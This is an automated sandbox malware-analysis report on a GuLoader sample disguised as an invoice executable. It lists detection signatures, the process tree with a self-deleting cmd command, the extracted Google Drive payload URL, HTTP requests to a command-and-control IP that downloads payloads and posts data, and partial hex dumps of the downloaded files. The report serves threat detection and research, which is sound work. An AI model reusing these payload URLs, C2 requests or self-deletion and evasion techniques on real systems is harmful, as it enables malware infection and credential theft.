

Windows Analysis Report usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe

Overview

General Information

Sample Name: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
Analysis ID: 482656
MD5: 257e1f881863b023fcddaedb2ac22e68
SHA1: 9cff8e3a2a2cb5ad3acba8d4260b2581e0098ac9
SHA256: 856d455d07bff404e39b422f1ad0bbff9397707c86670dbc1134729b44a8c868
Tags: exe, guloader

Most interesting Screenshot: (image not included in this export)

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
Tries to detect virtualization through RDTSC time measurements
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Creates processes with suspicious names
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe (PID: 3952 cmdline: 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe' MD5: 257E1F881863B023FCDDAEDB2AC22E68)
    • usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe (PID: 6248 cmdline: 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe' MD5: 257E1F881863B023FCDDAEDB2AC22E68)
      • cmd.exe (PID: 1768 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6968 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=10smU8Pga"}

Yara Overview

Memory Dumps

Source: 00000000.00000002.541230200.00000000022F0000.00000040.00000001.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security

    Sigma Overview

    No Sigma rule has matched

    Jbx Signature Overview


    AV Detection:

    Found malware configuration
    Source: 00000000.00000002.541230200.00000000022F0000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=10smU8Pga"}
    Multi AV Scanner detection for submitted file
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Virustotal: Detection: 28%
    Machine Learning detection for sample
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Joe Sandbox ML: detected
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: unknown | HTTPS traffic detected: 142.250.102.101:443 -> 192.168.2.5:49788 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.102.132:443 -> 192.168.2.5:49789 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.5:49790 version: TLS 1.2
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.24.dr
    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.24.dr
    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, nss3.dll.24.dr
    Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.24.dr
    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.24.dr
    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.24.dr
    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.24.dr
    Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.24.dr
    Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.24.dr
    Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy_InUse.dll.24.dr
    Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.24.dr
    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.24.dr
    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.24.dr
    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.24.dr
    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862380174.000000006F6C9000.00000002.00020000.sdmp, mozglue.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.24.dr
    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.24.dr
    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.24.dr
    Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.24.dr
    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.24.dr
    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.24.dr
    Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.24.dr
    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.24.dr
    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.24.dr
    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.24.dr
    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.24.dr
    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.24.dr
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

    Networking:

    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractor | URLs: https://drive.google.com/uc?export=download&id=10smU8Pga
    Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global traffic | HTTP traffic detected:
        GET /marinolumuop HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Content-Type: text/plain; charset=UTF-8
        Host: telete.in
    Source: global traffic | HTTP traffic detected:
        POST / HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Content-Type: text/plain; charset=UTF-8
        Content-Length: 128
        Host: 94.158.245.117
    Source: global traffic | HTTP traffic detected:
        GET //l/f/jYtq4XsB3dP17SpzNNud/28e4ca709c3ae4e969310e3d8acd9cfc29159591 HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Host: 94.158.245.117
    Source: global traffic | HTTP traffic detected:
        GET //l/f/jYtq4XsB3dP17SpzNNud/fc0be222df12d21cfda3f20b85f1cab0e0a3d225 HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Host: 94.158.245.117
    Source: global traffic | HTTP traffic detected:
        POST / HTTP/1.1
        Cache-Control: no-cache
        Connection: Keep-Alive
        Pragma: no-cache
        Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV
        Content-Length: 55359
        Host: 94.158.245.117
    Source: Joe Sandbox View | IP Address: 195.201.225.248
    Source: Joe Sandbox View | IP Address: 94.158.245.117
    Source: global traffic | HTTP traffic detected:
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 13 Sep 2021 23:07:19 GMT
        Content-Type: application/octet-stream
        Content-Length: 916735
        Connection: keep-alive
        Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
        ETag: "612fa893-dfcff"
        Accept-Ranges: bytes
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 
00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
    Source: global traffic | HTTP traffic detected:
        GET /uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4 HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Host: drive.google.com
        Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected:
        GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f4m8v3r8r5cuquncp7lqv8a7pcklg93e/1631574375000/14701716994733946506/*/10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4?e=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
        Cache-Control: no-cache
        Host: doc-04-1s-docs.googleusercontent.com
        Connection: Keep-Alive
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
    Source: global traffic | HTTP traffic detected:
        HTTP/1.1 200 OK
        Server: nginx
        Date: Mon, 13 Sep 2021 23:07:24 GMT
        Content-Type: application/octet-stream
        Content-Length: 2828315
        Connection: keep-alive
        Last-Modified: Wed, 01 Sep 2021 16:21:39 GMT
        ETag: "612fa893-2b281b"
        Accept-Ranges: bytes
        Data Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 
bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
    Source: unknown | TCP traffic detected without corresponding DNS query: 94.158.245.117 (reported 50 times)
    Source: ldif60.dll.24.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: ldif60.dll.24.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | String found in binary or memory: http://creativecommons.org/licenses/by-nc-sa/3.0/
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://crl.securetrust.com/STCA.crl0
    Source: ldif60.dll.24.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
    Source: ldif60.dll.24.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: ldif60.dll.24.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: ldif60.dll.24.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: ldif60.dll.24.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://ocsp.accv.es0
    Source: ldif60.dll.24.dr | String found in binary or memory: http://ocsp.digicert.com0C
    Source: ldif60.dll.24.dr | String found in binary or memory: http://ocsp.digicert.com0N
    Source: ldif60.dll.24.dr | String found in binary or memory: http://ocsp.thawte.com0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://policy.camerfirma.com0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://repository.swisssign.com/0
